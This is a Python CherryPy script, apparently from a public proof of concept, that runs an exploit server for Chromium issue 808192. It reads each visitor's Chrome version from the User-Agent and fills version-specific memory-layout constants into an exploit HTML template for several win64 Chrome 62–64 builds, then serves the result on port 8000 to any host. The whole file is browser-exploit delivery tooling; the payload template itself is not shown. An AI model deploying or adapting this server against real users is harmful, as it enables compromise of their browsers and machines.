#! /usr/bin/python

import cherrypy
import re

issue_808192_pre_64_0_3282_140 = {
  'tDerivedNCount': '(17 * 87481) - 8',
  'tDerivedNDepth': '19 * 19',
  'tJSFunctionCodeOffset': '0x38',
}

issue_808192_post_64_0_3282_140 = {
  'tDerivedNCount': '(2 * 2 * 2 * 2 * 31 * 601) - 8',
  'tDerivedNDepth': '1801',
  'tJSFunctionCodeOffset': '0x30',
}

issue_808192_versions = {
  # These are win64 stable versions that have been tested. Mileage may vary
  # with other platforms (especially 32-bit.)

  '62.0.3202.62': issue_808192_pre_64_0_3282_140,
  '62.0.3202.75': issue_808192_pre_64_0_3282_140,
  '62.0.3202.89': issue_808192_pre_64_0_3282_140,
  '62.0.3202.94': issue_808192_pre_64_0_3282_140,
  
  '63.0.3239.84': issue_808192_pre_64_0_3282_140,
  '63.0.3239.108': issue_808192_pre_64_0_3282_140,
  '63.0.3239.132': issue_808192_pre_64_0_3282_140,
  
  '64.0.3282.119': issue_808192_pre_64_0_3282_140,
  '64.0.3282.140': issue_808192_post_64_0_3282_140,
}

def issue_808192(version):
  config = issue_808192_versions[version]
  with open('issue_808192.html'.format(version), 'r') as tmp:
    exploit = tmp.read()
    for key in config.keys():
      value = config[key]
      exploit = exploit.replace(key, value)
    return exploit


def not_supported(version):
  return '<html><body><pre>Unsupported Chrome version {}</pre></body></html>'.format(version)


class ExploitServer(object):
  @cherrypy.expose
  def index(self):
    cherrypy.response.headers['Cache-Control'] = 'no-store'
    cherrypy.response.headers['Content-Type'] = 'text/html'
    version = re.search('Chrome\/(\S+)', cherrypy.request.headers['User-Agent']).group(1)
    if version in issue_808192_versions:
      return issue_808192(version)
    else:
      return not_supported(version)


def main():
  cherrypy.config.update({'server.socket_port':8000, 'server.socket_host':'0.0.0.0'})
  cherrypy.quickstart(ExploitServer())


if __name__ == '__main__':
	main()